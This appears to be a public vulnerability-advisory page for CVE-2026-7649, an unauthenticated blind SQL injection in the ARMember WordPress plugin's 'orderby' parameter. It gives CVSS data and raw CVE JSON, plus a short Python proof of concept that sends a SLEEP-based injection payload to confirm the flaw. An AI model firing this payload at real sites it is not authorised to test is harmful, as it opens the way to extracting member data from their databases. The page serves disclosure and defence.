Security Vulnerability Report
δΈ­ζ–‡
CVE-2026-7649 CVSS 7.5 HIGH

CVE-2026-7649

Published: 2026-05-02 08:16:28
Last Modified: 2026-05-05 19:19:24

Description

The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 4.0.60 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

ARMember <= 4.0.60

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 import requests import time def check_sqli(url): # Vulnerable parameter: orderby # Payload for time-based blind SQL injection payload = "1' AND SLEEP(5)-- -" target_url = f"{url}/?arm_action=members&orderby={payload}" try: start_time = time.time() response = requests.get(target_url, timeout=10) end_time = time.time() elapsed_time = end_time - start_time if elapsed_time >= 5: print(f"[+] Vulnerability confirmed! Response time: {elapsed_time:.2f}s") else: print(f"[-] Not vulnerable or patched. Response time: {elapsed_time:.2f}s") except requests.RequestException as e: print(f"Error: {e}") if __name__ == "__main__": target = "http://example.com" # Replace with target URL check_sqli(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7649", "sourceIdentifier": "[email protected]", "published": "2026-05-02T08:16:28.403", "lastModified": "2026-05-05T19:19:23.900", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup plugin for WordPress is vulnerable to time-based blind SQL Injection via the 'orderby' parameter in all versions up to, and including, 4.0.60 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_members_directory.php#L1019", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/armember-membership/tags/4.0.60/core/classes/class.arm_shortcodes.php#L434", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_members_directory.php#L1019", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L36", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/armember-membership/trunk/core/classes/class.arm_shortcodes.php#L434", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/eb064156-f54b-4401-9d4f-29f0952deb24?source=cve", "source": "[email protected]"}]}}